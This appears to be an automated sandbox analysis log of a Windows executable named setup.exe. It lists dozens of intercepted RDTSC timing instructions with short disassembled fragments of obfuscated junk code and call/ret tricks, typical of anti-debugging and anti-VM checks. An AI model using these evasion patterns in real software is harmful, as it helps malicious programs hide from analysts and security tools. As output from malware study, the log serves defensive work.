Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F191 second address: 57F197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F31D second address: 57F322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F322 second address: 57F328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FD43 second address: 57FDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F808D4B80C2h 0x00000010 jnl 00007F808D4B80BCh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f jnp 00007F808D4B80BCh 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push edi 0x00000029 jnl 00007F808D4B80BCh 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F808D4B80C0h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FDA6 second address: 57FDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FEEE second address: 57FF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D180Ah], eax 0x0000000f lea eax, dword ptr [ebp+124837D3h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F808D4B80B8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2508h], ecx 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FF30 second address: 57FF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FF34 second address: 57FF50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D4B80C4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FF50 second address: 57FF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57FF54 second address: 57FF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE0EC second address: 5CE0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE0F0 second address: 5CE102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F808D4B80B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE102 second address: 5CE106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE20D second address: 5CE213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE213 second address: 5CE217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE217 second address: 5CE223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE223 second address: 5CE229 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE229 second address: 5CE254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F808D4B80C3h 0x0000000c jmp 00007F808D4B80BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE254 second address: 5CE263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F808D280526h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE263 second address: 5CE26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F808D4B80B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE584 second address: 5CE588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE588 second address: 5CE592 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F808D4B80B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE592 second address: 5CE59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE59B second address: 5CE5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C8h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE5B8 second address: 5CE5D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280536h 0x00000007 jnp 00007F808D280532h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5CE5D8 second address: 5CE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5D29C4 second address: 5D29D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F808D280526h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5D2292 second address: 5D2297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5D2658 second address: 5D2690 instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F808D28052Dh 0x00000010 jmp 00007F808D280531h 0x00000015 jmp 00007F808D28052Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5D6083 second address: 5D6093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DCC52 second address: 5DCC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F808D280526h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DCC5F second address: 5DCC66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DCC66 second address: 5DCC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jno 00007F808D280526h 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DCC7C second address: 5DCC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DB5B3 second address: 5DB5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280537h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DB5CE second address: 5DB5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F808D4B80C2h 0x0000000d jo 00007F808D4B80BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBC95 second address: 5DBC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBC9A second address: 5DBCA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBCA2 second address: 5DBCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBCA6 second address: 5DBCB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F824 second address: 57F82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F808D280526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F82F second address: 57F87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+124583DFh], ebx 0x0000000e mov ebx, dword ptr [ebp+12483812h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F808D4B80B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e add eax, ebx 0x00000030 mov dword ptr [ebp+122D21C2h], ebx 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jl 00007F808D4B80BCh 0x0000003f jbe 00007F808D4B80B6h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F87C second address: 57F893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D28052Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F893 second address: 57F8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F808D4B80B8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movzx edx, ax 0x00000026 push 00000004h 0x00000028 mov dword ptr [ebp+122D17FAh], eax 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F8D2 second address: 57F8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F8D6 second address: 57F8DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F8DC second address: 57F8E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F8E1 second address: 57F8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F8E7 second address: 57F906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F808D280530h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57F906 second address: 57F90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBE2D second address: 5DBE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pushad 0x0000000c jne 00007F808D280539h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F808D280526h 0x0000001a jl 00007F808D280526h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBE60 second address: 5DBE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBF75 second address: 5DBF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBF79 second address: 5DBF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBF85 second address: 5DBF9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F808D28053Bh 0x00000008 jmp 00007F808D28052Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBF9E second address: 5DBFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F808D4B80C8h 0x00000011 jmp 00007F808D4B80BBh 0x00000016 jmp 00007F808D4B80BAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F808D4B80BAh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBFF0 second address: 5DBFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DBFF4 second address: 5DBFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DFD75 second address: 5DFD8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D280532h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 535062 second address: 53508B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F808D4B80C0h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53508B second address: 535091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 535091 second address: 5350AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edx 0x00000007 ja 00007F808D4B80BCh 0x0000000d jp 00007F808D4B80D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DFA63 second address: 5DFA79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3D97 second address: 5E3D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3D9B second address: 5E3DA5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D280526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3334 second address: 5E333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E333A second address: 5E3346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F808D280526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3346 second address: 5E3360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F808D4B80BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3360 second address: 5E3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3364 second address: 5E3368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3368 second address: 5E3378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F808D280526h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E34C1 second address: 5E34C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3634 second address: 5E363A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E363A second address: 5E363E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E363E second address: 5E3655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3655 second address: 5E3659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3659 second address: 5E3679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jns 00007F808D280532h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E3679 second address: 5E367D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E399D second address: 5E39A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EA3F5 second address: 5EA43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F808D4B80D2h 0x00000011 jmp 00007F808D4B80C6h 0x00000016 jl 00007F808D4B80B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EA89F second address: 5EA8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280536h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F808D280526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EA8C5 second address: 5EA8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EA8CD second address: 5EA8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EABBE second address: 5EABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EB1B5 second address: 5EB1BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EB1BA second address: 5EB1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F808D4B80B6h 0x0000000a popad 0x0000000b jmp 00007F808D4B80C8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F808D4B80B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EB9CD second address: 5EB9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F808D280526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EB9D7 second address: 5EB9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EBFAB second address: 5EBFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5EBFB0 second address: 5EBFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F808D4B80B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F11C0 second address: 5F11C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F11C4 second address: 5F11E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F808D4B80C3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F11E4 second address: 5F11E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F11E8 second address: 5F11EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0351 second address: 5F0357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
